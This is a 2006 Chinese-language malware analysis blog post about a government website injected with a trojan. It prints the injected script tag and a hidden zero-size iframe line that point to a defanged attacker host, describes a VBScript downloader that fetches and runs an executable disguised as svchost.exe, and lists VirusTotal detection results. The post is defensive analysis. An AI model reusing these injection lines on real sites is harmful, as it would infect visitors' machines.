一个被挂木马的政府网站-蒲公英云

一个被挂木马的政府网站

endurer　原创
2006-09-21　第1版

该网站首页被加入代码：
/————
＜script language=”JavaScript” src=”hxxp://www***.zhu**jiang***q*h*.com/images/ad.js”＞＜/script＞
-———-/

ad.js　的内容为：
/————
document.write(“＜iframe src=hxxp://www***.zhu**jiang***q*h*.com/images/ad***.htm width=0 height=0＞＜/iframe＞”);
-———-/

ad***.htm　Kaspersky报为：Trojan-Downloader.VBS.Small.av，瑞星报为 Trojan.DL.VBS.Agent.l，其内容为Encode加密的VBScript脚本代码，利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件会下载 hxxp://www***.zhu**jiang***q*h*.com/images/baidu.exe，保存为 %temp%/svchost.exe，并利用Shell.Application 对象的 ShellExecute 方法来运行。

baidu.exe　瑞星报为 Trojan.DL.Small.tk。

Complete scanning result of “baidu.exe.del”, received in VirusTotal at 09.21.2006, 14:50:42 (CET).

Antivirus	Version	Update	Result
AntiVir	7.2.0.16	09.21.2006	HEUR/Malware
Authentium	4.93.8	09.21.2006	no virus found
Avast	4.7.844.0	09.19.2006	Win32:Tiny-K
AVG	386	09.20.2006	Downloader.Generic.RRD
BitDefender	7.2	09.21.2006	Generic.Malware.dld!!.17ADDB55
CAT-QuickHeal	8.00	09.20.2006	(Suspicious) - DNAScan
ClamAV	devel-20060426	09.21.2006	no virus found
DrWeb	4.33	09.21.2006	Trojan.DownLoader.4554
eTrust-InoculateIT	23.73.1	09.21.2006	no virus found
eTrust-Vet	30.3.3090	09.21.2006	no virus found
Ewido	4.0	09.21.2006	no virus found
Fortinet	2.82.0.0	09.20.2006	suspicious
F-Prot	3.16f	09.21.2006	no virus found
F-Prot4	4.2.1.29	09.21.2006	no virus found
Ikarus	0.2.65.0	09.20.2006	no virus found
Kaspersky	4.0.2.24	09.21.2006	Trojan-Downloader.Win32.Tiny.y
McAfee	4856	09.20.2006	no virus found
Microsoft	1.1560	09.21.2006	no virus found
NOD32v2	1.1765	09.20.2006	a variant of Win32/TrojanDownloader.Tiny.Y
Norman	5.90.23	09.21.2006	W32/Suspicious_U.gen
Panda	9.0.0.4	09.21.2006	Suspicious file
Sophos	4.09.0	09.21.2006	no virus found
Symantec	8.0	09.21.2006	no virus found
TheHacker	6.0.1.075	09.21.2006	no virus found
UNA	1.83	09.20.2006	no virus found
VBA32	3.11.1	09.21.2006	no virus found
VirusBuster	4.3.7:9	09.20.2006	no virus found